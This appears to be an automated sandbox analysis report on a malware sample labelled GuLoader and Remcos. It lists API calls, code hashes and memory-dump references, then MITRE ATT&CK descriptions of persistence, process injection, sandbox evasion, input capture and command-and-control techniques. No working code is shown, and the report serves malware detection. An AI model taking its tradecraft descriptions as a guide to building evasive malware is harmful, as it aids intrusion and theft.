Function 00574B8B, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?), ref: 00574EB1

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction ID: a55f2e39629da76126ebf854985986a406950a6dc3b1017920c77fee84382eb5
Opcode Fuzzy Hash: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction Fuzzy Hash: BA110136988344DFC7986EB4D9456EABBA2FF59390F42880DDCCA53514D3340A92CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0056267D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 00562687

Strings

E, xrefs: 005627D4
Guc, xrefs: 00562694

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: Guc$E
API String ID: 1129996299-111232842
Opcode ID: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction ID: c4a7ca92730f4e0d7bb155835fa0d19564d059fd2087c347d72d8f8c751b5a18
Opcode Fuzzy Hash: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction Fuzzy Hash: E171B532E09A858FDB56EF7CD8CDDD6BBA5AE42724F1482CCD4824B44BE232451BC652

Uniqueness

Uniqueness Score: -1.00%

Function 0057C2D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

Strings

Gf8, xrefs: 0057C7D9

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction ID: 035229f8c99428b44c26695dc977b51f50e39b79c550c5770c8edc15aee99d94
Opcode Fuzzy Hash: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction Fuzzy Hash: 6521D171108288CBDF749E28ED496ED3E76BF94310F60992AAC4E9B201D7305A41AB53

Uniqueness

Uniqueness Score: -1.00%

Function 0057742D, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00564924), ref: 005781A2

Memory Dump Source

Source File: 00000014.00000002.139080067245.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction ID: 7ca36712469e8a1f25caaf87be14873fe3167984fa77d065f5722fdb7364c839
Opcode Fuzzy Hash: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction Fuzzy Hash: 65C0803858155D54D94072D4624DA741D10BFD43C1FD8C4256D1D1790FCF34C4057B51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: Dlls.exe PID: 4696 Parent PID: 7300 Dlls.exeCOMMON

Executed Functions

Function 00581BCE, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 566COMMON

Download Yara Rule

Strings

Z5, xrefs: 00583D6F
Gf8, xrefs: 0057C7D9

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: Gf8$Z5
API String ID: 3389902171-947967345
Opcode ID: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction ID: c6c960dc5310d0beea88e0b8b0badbfc3d5daf5f9d75bba529208680e5522496
Opcode Fuzzy Hash: 2296fab55f1c8ed6d1c170149b31a38f618417abe284a01bd0c8561280f84c22
Instruction Fuzzy Hash: 5832D3715083858FDB35DF38C8987EA7FA2BF56310F5982AADC999F296D3308641C712

Uniqueness

Uniqueness Score: -1.00%

Function 0057557A, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0057C2D8: LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

NtAllocateVirtualMemory.NTDLL ref: 00575BAE

Strings

_, xrefs: 00576024

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: _
API String ID: 2616484454-701932520
Opcode ID: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction ID: 279c0dbdecb7716e084ca0d5a795df40d0f66d2cf0b5fdb82c379f92cd0253c8
Opcode Fuzzy Hash: 0a951bf2a667fc2ffffe84a5f486d5a5026bcc7952e377380f4c3f2a527b1682
Instruction Fuzzy Hash: 99A1FB31E086869FDB16EF3CDCCDEE67BA6AF41714F45828CA8875B04AE3714516C782

Uniqueness

Uniqueness Score: -1.00%

Function 0058474A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

1bU, xrefs: 00584B4E

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 1bU
API String ID: 0-1111237263
Opcode ID: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction ID: 95ac01ba15637154fb95b604aa115dd932f09398d143d3e0366c5a0cf2c14552
Opcode Fuzzy Hash: 5d26eeb61cba4eb7f5cae6757a1faeb0780fc9a9d562307f876b6119f16c2d66
Instruction Fuzzy Hash: 88713471A04A48CFDF35EE24C99C7EA3BB2BF95310F61461ACC4AAF214D3318A45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0057ECDD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

Strings

Gf8, xrefs: 0057C7D9

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction ID: 9da73af8162d02fbc084959978cfbeed09a152287dce85555fd64047fac297aa
Opcode Fuzzy Hash: 698ac7fa9a16c30732d87508c17710465fd7dff275ac96f8448f73bbaed36040
Instruction Fuzzy Hash: 523146755082888BDF70DE35ED482EA3EB2BFE4310FA5C92E9C4D5B204D3715A42B792

Uniqueness

Uniqueness Score: -1.00%

Function 00566970, Relevance: 1.7, APIs: 1, Instructions: 210nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 00566972

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: bbdd4184b9c6f43cbd83bf701d028af3b6d0c7a13e1de9c3c7e4e2ac0d3b6566
Instruction ID: c2d68468108bc97e0435b9b1fb2777c07f99e991e087991684f2cfe9c1543061
Opcode Fuzzy Hash: bbdd4184b9c6f43cbd83bf701d028af3b6d0c7a13e1de9c3c7e4e2ac0d3b6566
Instruction Fuzzy Hash: BD81C732E185868FDB56FF3CE8CCDA67FA6AE42714F1482CCA4834B44BD236451BC652

Uniqueness

Uniqueness Score: -1.00%

Function 00586E0F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00587100

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d597ffac7ff54cdbac2dc824901331cbe89459a7ad892a5d97136f7bd529ff01
Instruction ID: dea66bb45262ed014a178b1f9b0df8e05a18d9dba7521c9e3742e43e38991e2d
Opcode Fuzzy Hash: d597ffac7ff54cdbac2dc824901331cbe89459a7ad892a5d97136f7bd529ff01
Instruction Fuzzy Hash: 9E112BB06043018FDB549E64898AF6A3A56FF8A324F2583A5AD46EB1B3C735C881C721

Uniqueness

Uniqueness Score: -1.00%

Function 00584084, Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 00584233

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction ID: 490b3ca9e6e85a12b57690301aafc7f88f6a0b65009f90a58abe5948c7f5c734
Opcode Fuzzy Hash: 6915733f7f1efe11a760b8a05010e9941f3b490219f892f823f8ea32893b3593
Instruction Fuzzy Hash: F51155714047949FDB34CF68CC986E6BBA4FF89320F44C1AEDC866B245D3705A02CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00574B8B, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?), ref: 00574EB1

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction ID: a55f2e39629da76126ebf854985986a406950a6dc3b1017920c77fee84382eb5
Opcode Fuzzy Hash: 7e01c117410fc39e1368157bc4c9cf9280b8ca0a60405592e7f2b7927a61b07b
Instruction Fuzzy Hash: BA110136988344DFC7986EB4D9456EABBA2FF59390F42880DDCCA53514D3340A92CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0056267D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 00562687

Strings

Guc, xrefs: 00562694
E, xrefs: 005627D4

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: Guc$E
API String ID: 1129996299-111232842
Opcode ID: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction ID: c4a7ca92730f4e0d7bb155835fa0d19564d059fd2087c347d72d8f8c751b5a18
Opcode Fuzzy Hash: 7c81b8248fff04fbc6bbb701ae81b24491267ad8ce40758eb2a9ac279872b480
Instruction Fuzzy Hash: E171B532E09A858FDB56EF7CD8CDDD6BBA5AE42724F1482CCD4824B44BE232451BC652

Uniqueness

Uniqueness Score: -1.00%

Function 0057C2D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(D7EA1F99,1AB02117,?,00008769,?,0057EB7C,?,0057CA52,1AB02117), ref: 0057D310

Strings

Gf8, xrefs: 0057C7D9

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Gf8
API String ID: 1029625771-2358942130
Opcode ID: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction ID: 035229f8c99428b44c26695dc977b51f50e39b79c550c5770c8edc15aee99d94
Opcode Fuzzy Hash: a8153bd9524b4687a0b5393ca051d4a2c675bd0819dbb9147d8b46f57ed7e1bb
Instruction Fuzzy Hash: 6521D171108288CBDF749E28ED496ED3E76BF94310F60992AAC4E9B201D7305A41AB53

Uniqueness

Uniqueness Score: -1.00%

Function 0057742D, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00564924), ref: 005781A2

Memory Dump Source

Source File: 00000015.00000002.139147557891.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction ID: 7ca36712469e8a1f25caaf87be14873fe3167984fa77d065f5722fdb7364c839
Opcode Fuzzy Hash: bbe7f893722e271d2332a33a82b2110829c996a555101d441d4084932ec0d8ab
Instruction Fuzzy Hash: 65C0803858155D54D94072D4624DA741D10BFD43C1FD8C4256D1D1790FCF34C4057B51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report mU9H96igb3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: Remcos

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets